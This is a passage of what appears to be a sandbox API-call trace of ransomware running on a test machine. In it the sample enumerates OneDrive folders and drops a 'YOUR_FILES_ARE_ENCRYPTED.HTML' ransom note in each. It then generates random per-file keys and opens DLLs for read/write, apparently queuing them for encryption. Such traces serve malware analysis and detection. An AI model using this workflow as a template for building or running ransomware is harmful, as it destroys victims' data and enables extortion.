lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi" [0113.500] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\*" [0113.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bb21b30, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7bb21b30, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c2950a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.501] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bb21b30, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7bb21b30, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c2950a9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="..", cAlternateFileName="")) returned 1 [0113.501] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c2950a9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c2950a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c32dc26, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.501] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.501] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.501] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.501] lstrlenW (lpString=".mui") returned 4 [0113.501] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.501] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c2950a9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c2950a9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c32dc26, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.501] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.501] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.501] GetProcessHeap () returned 0x600000 [0113.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.502] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.503] CloseHandle (hObject=0x324) returned 1 [0113.503] GetProcessHeap () returned 0x600000 [0113.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.503] GetProcessHeap () returned 0x600000 [0113.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.503] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c353c50, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c353c50, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c353c50, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="fil-ph", cAlternateFileName="")) returned 1 [0113.503] StrStrIW (lpFirst="fil-ph", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph") returned 82 [0113.503] GetProcessHeap () returned 0x600000 [0113.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.503] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph" [0113.503] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\*" [0113.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c353c50, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c353c50, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c995f72, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.503] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c353c50, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c353c50, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c995f72, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="..", cAlternateFileName="")) returned 1 [0113.503] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c995f72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c995f72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7ca2ec66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.503] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.503] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.503] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.503] lstrlenW (lpString=".mui") returned 4 [0113.503] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.503] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c995f72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c995f72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7ca2ec66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.503] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.504] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.504] GetProcessHeap () returned 0x600000 [0113.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\fil-ph\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.504] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.505] CloseHandle (hObject=0x324) returned 1 [0113.505] GetProcessHeap () returned 0x600000 [0113.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.505] GetProcessHeap () returned 0x600000 [0113.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.505] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc09dbdb, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdc09dbdb, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdc9dad7b, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0113.505] StrStrIW (lpFirst="FileSync.LocalizedResources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.505] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll") returned 107 [0113.505] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0113.505] lstrlenW (lpString=".dll") returned 4 [0113.505] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0113.505] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.506] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=82112) returned 1 [0113.506] GetProcessHeap () returned 0x600000 [0113.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0113.507] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="FC") returned 2 [0113.507] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="9C") returned 2 [0113.507] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="73") returned 2 [0113.507] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="0C") returned 2 [0113.507] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="74") returned 2 [0113.507] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0C") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="7E") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="D7") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="B5") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="AD") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="6C") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="F9") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="95") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="58") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="83") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="E4") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="A6") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="BA") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F0") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="59") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E7") returned 2 [0113.508] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="5D") returned 2 [0113.508] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="7D") returned 2 [0113.508] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="66") returned 2 [0113.508] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A4") returned 2 [0113.508] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="EE") returned 2 [0113.508] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="34") returned 2 [0113.508] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="37") returned 2 [0113.508] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="8F") returned 2 [0113.508] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="1F") returned 2 [0113.508] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="5D") returned 2 [0113.508] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="14") returned 2 [0113.509] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll" [0113.509] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.509] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0113.509] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde1efd1, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdde1efd1, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe2f9dc06, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x28d8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0113.509] StrStrIW (lpFirst="FileSync.Resources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.509] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll") returned 98 [0113.509] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0113.509] lstrlenW (lpString=".dll") returned 4 [0113.509] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0113.509] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.510] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=2676928) returned 1 [0113.510] GetProcessHeap () returned 0x600000 [0113.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0113.512] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="31") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="0C") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8F") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="A1") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="9C") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="87") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="88") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B7") returned 2 [0113.512] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DC") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="70") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="B4") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="DD") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0B") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="DE") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="22") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7A") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="35") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B5") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="77") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="79") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="8C") returned 2 [0113.513] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="55") returned 2 [0113.513] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="FE") returned 2 [0113.513] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="CC") returned 2 [0113.513] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="48") returned 2 [0113.513] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="6D") returned 2 [0113.513] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="56") returned 2 [0113.513] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="70") returned 2 [0113.513] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B1") returned 2 [0113.513] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8F") returned 2 [0113.513] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="5C") returned 2 [0113.513] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7E") returned 2 [0113.514] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll" [0113.514] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.514] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0113.514] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe663028c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe663028c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe6d7d6ed, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x362c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0113.514] StrStrIW (lpFirst="FileSyncApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.514] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll") returned 91 [0113.514] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0113.514] lstrlenW (lpString=".dll") returned 4 [0113.514] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0113.514] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0113.515] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=221888) returned 1 [0113.515] GetProcessHeap () returned 0x600000 [0113.515] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0113.516] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7F") returned 2 [0113.516] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="39") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="EE") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="E1") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F8") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="15") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="CB") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="04") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="79") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="01") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D2") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="35") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="59") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: 